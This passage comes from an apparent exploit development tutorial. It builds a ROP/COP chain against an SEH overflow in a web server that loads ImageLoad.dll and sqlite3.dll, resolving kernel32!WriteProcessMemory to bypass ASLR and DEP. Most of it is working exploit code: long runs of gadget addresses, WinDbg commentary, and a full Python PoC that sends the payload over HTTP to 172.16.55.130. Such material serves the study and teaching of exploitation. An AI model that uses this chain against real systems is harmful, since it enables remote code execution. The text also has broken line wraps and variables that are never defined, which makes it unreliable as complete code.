crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
It should also be noted, that after each of these ROP gadgets are executed - the AL register will
be increased by 0x39 bytes. We will compensate for this in the future. Since AL only makes up
the lower 8 bits of the EAX register, this will not have much of an adverse effect on what we
are trying to accomplish.
ECX, after the ROP gadgets are executed, is loaded with the address for the nSize parameter
placeholder.
A nice gadget can be found, after parsing the PE, to overwrite the parameter placeholder with
the legitimate parameter.
The state of the parameters before the overwrite occurs can be seen below.
As we can see, the junk 0x22222222 parameter will be the target for the overwrite.
Stepping through the instruction, we have dynamically changed the parameter placeholder
for nSize to the legitimate parameter!
kernel32!WriteProcessMemory
Perfect! All that is left now is to is extract our current pointer to kernel32.dll and calculate the
offset between kernel32WriteFileImplementation and kernel32!WriteProcessMemory. After
this, we will use the same primitive of dynamically manipulating
the kernel32WriteProcessMemory parameter placeholder to point to the actual API.
Currently. ECX (the register we have been leveraging for each of the arbitrary writes to
overwrite function parameter placeholders), is 0x14 (20 decimal) bytes away from
the kernel32!WriteProcessMemory parameter placeholder.
Knowing this, we will prepare another arbitrary write by decrementing ECX by 0x14 bytes.
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
Once the ROP gadgets have executed, ECX now contains the same address as the parameter
placeholder for kernel32!WriteProcessMemory.
Since ECX is reserved for the arbitrary write, we will use EAX to also store
the kernel32!WriteProcessMemory parameter placeholder.
Recall that EDX still contains a value of 0x180, from the nSize parameter. After all, we have not
manipulated EDX since. Conveniently, the current distance between the address within EAX
and the kernel32!WriteProcessMemory parameter placeholder is 0x260.
Since we already have a routine of ROP and COP gadgets that increases EDX 0x180 bytes, we
can utilize the EXACT same routine to increase it another 0x180 bytes - which will give us a
value of 0x260! Once EDX contains the value of 0x260, we can subtract it from EAX and place
the difference in EAX. This will allow us to store the kernel32!WriteProcessMemory parameter
placholder in EAX. This time, however, since EDI already contains the old “return to the stack”
routine - we can just directly add to EDX.
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
After the add edx COP gadgets execute, EDX contains the distance between
the kernel32!WriteProcessMemory and EAX (which is 0x260).
After the COP gadgets execute, the sub eax, edx ; ret gadget takes over execution - resulting in
EAX now containing the address of the kernel32!WriteProcessMemory parameter placeholder.
So currently, as it stands, the stack address of 0x2636920, which changes when the process
restarts, points to 0x61c832e4 - which then points to the kernel32.dll address. This means we
have a pointer to a pointer to the pointer we would like to extract. Knowing this, we will
dereference 0x2636920 and store the result (which is 0x61c832e4) into EAX. Then, utilizing the
exact same routine, we will dereference 0x61c832e4 (which is a pointer
to kernel32!WriteFileImplementation) and store the result in EAX. We can achieve this with
two ROP gadgets.
crash += struct.pack('<L', 0x1002248c) # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x1002248c) # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR
enabled module)
Program execution hits the first gadget, where WinDbg shows us what will be placed in EAX
(0x61c832e4).
Utilizing the same ROP gadget, we successfully extract a pointer to kernel32.dll into EAX -
dynamically!
This is great news. We have defeated ASLR on the system itself. What needs to happen now is
that we need to find the offset
between kernel32!WriteProcessMemory and kernel32WriteFileImplementation. To do this, we
can use WinDbg.
Great! The distance between the two functions is 0xfffaca4d (remember, to avoid NULL bytes -
we use the negative distance).
Instead of fighting with two’s complement math - let’s just use a different function from the
IAT. Preferably, let’s find a function that is less than in value, in terms of the virtual address,
than kernel32!WriteProcessMemory.
Looking at the IAT for ImageLoad, we can see there is a nice IAT entry that points
to kernel32!GetStartupInfoA.
Subtracting the two functions results in a value of 0xfffffd2d - and also yields our desired
output!
Now that we have solved this issue, let’s show the full PoC up until this point.
import sys
import os
import socket
import struct
# 4063 byte SEH offset
# Saving address near ESP for relative calculations into EAX and ECX
crash += struct.pack('<L', 0x61c05e8c) # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled
module)
# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for
loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be
placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP
gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x1001283e) # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled
module)
# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov
eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget
compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping"
down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX
to be "values around the stack"
crash += struct.pack('<L', 0x61c30547) # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x61c6588d) # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx
; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090) # Padding to compensate for above ROP gadget (pop
ebx)
crash += struct.pack('<L', 0x90909090) # Padding to compensate for above ROP gadget (pop
ebp in leave instruction)
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at
an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before
shellcode)
crash += struct.pack('<L', 0x1001fce9) # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0xfffffd44) # Shellcode is about negative 0xfffffd44 bytes away from
EAX
crash += struct.pack('<L', 0x10022f45) # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x10021bfb) # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-
ASLR enabled module)
crash += struct.pack('<L', 0x1001c31e) # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled
module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c) # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate
offset from kernel32!GetStartupInfoA
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by
0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of
ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
# EDI still contains return to stack ROP gadget for COP gadget compensation
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x10015ce5) # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x1002248c) # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x1002248c) # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR
enabled module)
# 4063 total offset to SEH
http_request += "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()
Now that we have an updated POC, let’s use a ROP routine to subtract this value from EAX.
crash += struct.pack('<L', 0x10022c4c) # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x10022c1e) # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll
(non-ASLR enabled module)
crash += struct.pack('<L', 0x10015ce5) # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
4. Subtract the offset from EDX and EAX - placing the result in EAX
The negative distance between the two kernel32.dll pointers is loaded into EBX.
The distance is then loaded into EDX.
Program execution then reaches the sub eax, edx instruction.
If you can recall, we already decremented ECX to make it contain the address of the parameter
placeholder. However, the ROP gadget we will use for our arbitrary write, does so with ECX at
an offset of 0x8. To compensate for this, we will decrement ECX by 0x8 bytes. This way, when
the arbitrary write gadget adds 0x8 to ECX, we will have already compensated.
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x10021bfb) # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-
ASLR enabled module)
Program execution reaches the arbitrary write - and we can see we will be overwriting our
parameter placeholder - as intended.
The arbitrary write occurs, and we have successfully dynamically placed our parameters on the
stack!
Now that everything has been configured properly, the final goal is to kick off this function call.
To do so, we will need to load the stack address which points
to kernel32!WriteProcessMemory into ESP - and return into it.
Currently, after the ECX manipulation, ECX contains a stack address 0x8 bytes above the stack
address we want to load into ESP (this was due to compensation for the ECX + 0x8 arbitrary
write ROP gadget). This means we want to increase ECX to contain the address on the stack in
question.
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0x1001fa0d) # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x61c07ff8) # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled
module)
Let’s also add some breakpoints to “mimic” shellcode - directly after the xchg eax, esp ROP
gadget.
# Breakpoints
Running the updated POC - we can see that the call to kernel32!WriteProcessMemory is
complete - and that we have hit our breakpoints!
import sys
import os
import socket
import struct
# Saving address near ESP for relative calculations into EAX and ECX
crash += struct.pack('<L', 0x61c05e8c) # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled
module)
# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for
loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be
placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP
gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x1001283e) # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled
module)
# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov
eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget
compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping"
down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX
to be "values around the stack"
crash += struct.pack('<L', 0x61c30547) # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x61c6588d) # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx
; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090) # Padding to compensate for above ROP gadget (pop
ebx)
crash += struct.pack('<L', 0x90909090) # Padding to compensate for above ROP gadget (pop
ebp in leave instruction)
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at
an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret:
ImageLoad.dll (non-ASLR enabled module)
# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before
shellcode)
crash += struct.pack('<L', 0x1001fce9) # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR
enabled module)
crash += struct.pack('<L', 0xfffffd44) # Shellcode is about negative 0xfffffd44 bytes away from
EAX
crash += struct.pack('<L', 0x10022f45) # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x10021bfb) # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-
ASLR enabled module)
crash += struct.pack('<L', 0x1001c31e) # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled
module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c) # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled
module)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll
(non-ASLR enabled module) (COP gadget)
